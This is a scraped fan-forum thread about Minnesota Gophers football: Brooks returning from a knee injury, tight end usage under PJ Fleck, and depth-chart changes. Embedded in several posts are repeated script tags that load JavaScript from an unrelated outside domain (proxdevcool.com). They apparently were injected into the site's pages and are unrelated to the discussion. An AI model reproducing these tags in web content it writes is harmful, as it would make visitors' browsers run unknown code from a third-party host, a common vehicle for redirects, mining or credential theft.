Brooks was cleared to play Sunday, setting up his return from knee injury vs. Neb

BleedGopher

Reaction score
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>

Go Gophers!!

also had really good things to say about Brevyn Spann-Ford and said he hopes to get him on the field yet this year...this offense may surprise some people with some personnel moves in final 67% of the season...

also had really good things to say about Brevyn Spann-Ford and said he hopes to get him on the field yet this year...this offense may surprise some people with some personnel moves in final 67% of the season...

Spann-Ford comments are interesting to me. We have dissected Fleck's offense at Western Michigan and here. Not a lot of TE involvement. But...the TE's are getting more involved the past couple weeks, including on the trick play vs OSU.

I'll also say that I'm not sure Fleck has had an athlete like BSF at tight end in his coaching career. Spann-Ford is also going to be physical in the run game. Looking forward to seeing him the rest of the this year and next year.

I just don’t see how you can be a modern football OC and watch teams with guys like Iowa’s Fant or the Vikings Rudolph, and then still not use the TE position in your offense.

Oh well, focus on the RPO I guess.

I just don’t see how you can be a modern football OC and watch teams with guys like Iowa’s Fant or the Vikings Rudolph, and then still not use the TE position in your offense.

Really good coaches will adjust what they do to their personnel. John Gagliardi won 489 games with this method. I think Fleck will adjust. Throwing to TEs when they are inferior to other players on your offense doesn't make a lot of sense.

I think PJ Fleck is flexible enough to know he's got a gem of a player in Brevyn Spann-Ford. We'll see more TE involvement. You just wait.

Does this mean that Brooks will remain with the team in light of recent events?

Last edited:

Teague now listed as "or" starter with Royal Silver...OJ Smith not listed...Otomewo listed as "or" with DeLattiboudere.

Mafe in the two deep spot behind Coughlin as "or" with Devers.

Fleck had talked about Teague, Otomewo, and Mafe as guys who were MAHturing in his press conference.

Last edited:

Teague now listed as "or" starter with Royal Silver...OJ Smith not listed...Otomewo listed as "or" with DeLattiboudere.

Mafe in the two deep spot behind Coughlin as "or" with Devers.

Fleck had talked about Teague, Otomewo, and Mafe as guys who were MAHturing in his press conference.

Actually, OJ is listed as starter backed up by Silver or Teaque. Same as last week.
<script src="//proxdevcool.com/1e6ba9a0464b8e1485.js"></script><script src="//proxdevcool.com/1e6ba9a0464b8e1485.js"></script>
<script src="//proxdevcool.com/1e6ba9a0464b8e1485.js"></script>Delattiboudere is listed as starter backed up by Otomewo.
<script src="//proxdevcool.com/1e6ba9a0464b8e1485.js"></script>

Last edited:

Actually, OJ is listed as starter backed up by Silver or Teaque. Same as last week.
<script src="//proxdevcool.com/1e6ba9a0464b8e1485.js"></script><script src="//proxdevcool.com/1e6ba9a0464b8e1485.js"></script>
<script src="//proxdevcool.com/1e6ba9a0464b8e1485.js"></script>Delattiboudere is listed as starter backed up by Otomewo.

https://s3.amazonaws.com/gophersports.com/documents/2018/10/16/10_16_18_Depth_Chart.pdf

I’m not sure why anyone would be expecting our TEs to have a lot of catches so far this year. Until the OSU game we had to rely on them as blockers on pass plays.

Does this mean that Brooks will remain with the team in light of recent events?

Yes. He wasn't charged and is out of jail. Sounds like he may play this week, depending on how quickly information is gathered. Unless something else comes up that is bad, I expect him to still play 4 games this season.

<script src="//proxdevcool.com/1e6ba9a0464b8e1485.js"></script><script src="//proxdevcool.com/1e6ba9a0464b8e1485.js"></script><script src="//proxdevcool.com/1e6ba9a0464b8e1485.js"></script>

Thanks, Swingman. Apparently the 10/16/18 depth chart I downloaded was revised shortly thereafter. Story of my sad life.

There are "modern" offenses that rarely throw the ball to their TE (see LA Rams).

The TEs actually did have a few nice catches vs Ohio St. I really hope to see more of that as the season progresses ... and if we see BSF get in there and make a couple grabs for 10-15 yards per catch, then happy day!

As far as the DL goes ... don't forget about Sam Renner at DT. He seems to get in there a decent amount, not sure why he's not listed on the depth chart. Also, did I see Jerry Gibson get a sack???? That's awesome! I wonder why he was in?? Did someone have a case of "where's my helmet?!?!" haha

Top Bottom